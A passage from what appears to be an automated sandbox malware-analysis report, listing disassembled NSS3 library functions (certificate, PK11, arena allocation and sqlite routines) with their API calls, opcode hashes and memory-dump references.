                                                                                                                                                                                                                            • Instruction ID: 397790f155d07ef17a1088594f3a621570ffb51d8093f0a60d2524b6476d30f3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2e7d5e78d75c50c9bf52016ed16fb7ce7452a533ca1375508b2e9f959be63f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA81E1716143A09FD715CF35D880B6A77F1EF44308F14982DE89E8BA91EB31E846CB52
                                                                                                                                                                                                                            Function 6CBACC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CBACD08
                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CBACE16
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAD079
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1351604052-0
                                                                                                                                                                                                                            • Opcode ID: 66d3e38a0f63be61c66a106a14d399910cfb478ecc6688a41832dba9a621a824
                                                                                                                                                                                                                            • Instruction ID: ae5bf2c2845ee8cf87b07cd1c6a586bd4c18fd0a4052c551b7deb8c5c78d9d19
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66d3e38a0f63be61c66a106a14d399910cfb478ecc6688a41832dba9a621a824
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59C190B1A042599FDB20CF65DC80BDAB7B4FB48308F1441A8D88897741E776EE96CF91
                                                                                                                                                                                                                            Function 6CB9DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CBA97C1,?,00000000,00000000,?,?,?,00000000,?,6CB87F4A,00000000), ref: 6CB9DC68
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DD36
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE2D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE43
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE76
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF32
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF5F
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF78
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DFAA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1886645929-0
                                                                                                                                                                                                                            • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                            • Instruction ID: 21de349958d45a15051817e7433b09906589baefe246aa25de57498e12cd4e43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D981C571A06AC08BFF148E7BF9903697292DB67348F20843AD519CAFE5D778C884C613
                                                                                                                                                                                                                            Function 6CB73C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CB73C76
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB73C94
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: TlsGetValue.KERNEL32(00000000,?,6CB800D2,00000000), ref: 6CB695D2
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: EnterCriticalSection.KERNEL32(?,?,?,6CB800D2,00000000), ref: 6CB695E7
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: PR_Unlock.NSS3(?,?,?,?,6CB800D2,00000000), ref: 6CB69605
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB73CB2
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CB73CCA
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CB73CE1
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB8AE42), ref: 6CB730AA
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB730C7
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB730E5
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB73116
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB7312B
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PK11_DestroyObject.NSS3(?,?), ref: 6CB73154
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB7317E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3167935723-0
                                                                                                                                                                                                                            • Opcode ID: 743d39d5a1b154ef1645dd9a1362ca3f9465d45fe95fff69636ec96d1544a343
                                                                                                                                                                                                                            • Instruction ID: 3d89c8ad70b718a15d9e69f4f9c545b5f11f090d68c023357635dc10e460c83f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 743d39d5a1b154ef1645dd9a1362ca3f9465d45fe95fff69636ec96d1544a343
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F261B8B5A04240ABEF205F65DC41FAB76B9EF04748F084028FD59DAA52F731D915C7B2
                                                                                                                                                                                                                            Function 6CB62C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(C901896B), ref: 6CB62C5D
                                                                                                                                                                                                                              • Part of subcall function 6CBC0D30: calloc.MOZGLUE ref: 6CBC0D50
                                                                                                                                                                                                                              • Part of subcall function 6CBC0D30: TlsGetValue.KERNEL32 ref: 6CBC0D6D
                                                                                                                                                                                                                            • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB62C8D
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB62CE0
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: TlsGetValue.KERNEL32 ref: 6CB62E4E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableLookup.NSS3(?), ref: 6CB62E71
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableRemove.NSS3(?), ref: 6CB62E84
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PR_Unlock.NSS3 ref: 6CB62EA9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB62D23
                                                                                                                                                                                                                            • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB62D30
                                                                                                                                                                                                                            • CERT_MakeCANickname.NSS3(00000001), ref: 6CB62D3F
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB62D73
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB62DB8
                                                                                                                                                                                                                            • free.MOZGLUE ref: 6CB62DC8
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB63EC2
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB63ED6
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB63EEE
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB63F02
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_FreeArenaPool.NSS3 ref: 6CB63F14
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB63F27
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3941837925-0
                                                                                                                                                                                                                            • Opcode ID: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
                                                                                                                                                                                                                            • Instruction ID: 2b8817d02e7fae152445717093e3b1c6b0f42e6073b7d49281233d414e6d36a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8851BE71A042619BEB119F6ADC89B5B77E5EF84348F140428EC5993A50EB31E8158B93
                                                                                                                                                                                                                            Function 6CB67CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CB63F7F,?,00000055,?,?,6CB61666,?,?), ref: 6CB640D9
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CB61666,?,?), ref: 6CB640FC
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CB61666,?,?), ref: 6CB64138
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CB67CFD
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC89030), ref: 6CB67D1B
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CB61A3E,00000048,00000054), ref: 6CBBFD56
                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC89048), ref: 6CB67D2F
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CB67D50
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CB67D61
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CB67D7D
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB67D9C
                                                                                                                                                                                                                            • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CB67DB8
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CB67E19
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 70581797-0
                                                                                                                                                                                                                            • Opcode ID: a4cefb8823d62b62c6626a354f42ab263703ae0d8a32857d99366bdda87a9cd7
                                                                                                                                                                                                                            • Instruction ID: 235212cb935e6efb347fc10e242f18ad1445aeddd85fa0e70bba7fcea6255ba8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4cefb8823d62b62c6626a354f42ab263703ae0d8a32857d99366bdda87a9cd7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7341D6B6A001699BDB008F6ADC41BAF37A4EF5435CF050464EC19B7F50E770E91587E2
                                                                                                                                                                                                                            Function 6CBC4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CBC536F,00000022,?,?,00000000,?), ref: 6CBC4E70
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CBC4F28
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CBC4F8E
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CBC4FAE
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC4FC8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                            • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                                            • API String ID: 2709355791-2032576422
                                                                                                                                                                                                                            • Opcode ID: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
                                                                                                                                                                                                                            • Instruction ID: c16ca08c5e7f4399a89fda72f243a1b2caebe6c91d38664f536781cb905b0861
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66513871B051C78BEF05CAA984907FF7BF5DF46308F1A8125E898A7A41D3358A058FA3
                                                                                                                                                                                                                            Function 6CB07D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07E27
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07E67
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CB07EED
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB07F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                                                                            • Opcode ID: 86c6cbccf71c8f051d58b5d8f26b6b8bcd9d654fbce7c77245bf7b26e416aa46
                                                                                                                                                                                                                            • Instruction ID: a7f029e1b5f7ae89be380eb9fff31faf094e615eb98012665039f9d30f62704f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86c6cbccf71c8f051d58b5d8f26b6b8bcd9d654fbce7c77245bf7b26e416aa46
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F361D270B012859FCB05CF64C890BAABBB6FF45308F1445A8EC096BB52D770EC56CBA1
                                                                                                                                                                                                                            Function 6CAEFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEFD7A
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEFD94
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEFE3C
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEFE83
                                                                                                                                                                                                                              • Part of subcall function 6CAEFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CAEFEFA
                                                                                                                                                                                                                              • Part of subcall function 6CAEFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CAEFF3B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 1169254434-598938438
                                                                                                                                                                                                                            • Opcode ID: da4a2755096a8cc97ddcb166bfd6ec9c3953693ec8b29275f3c9f61ed8798900
                                                                                                                                                                                                                            • Instruction ID: 14c88aecbc676d929b5ca844aa855290a1df48e94acc749e26d317f808112f1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4a2755096a8cc97ddcb166bfd6ec9c3953693ec8b29275f3c9f61ed8798900
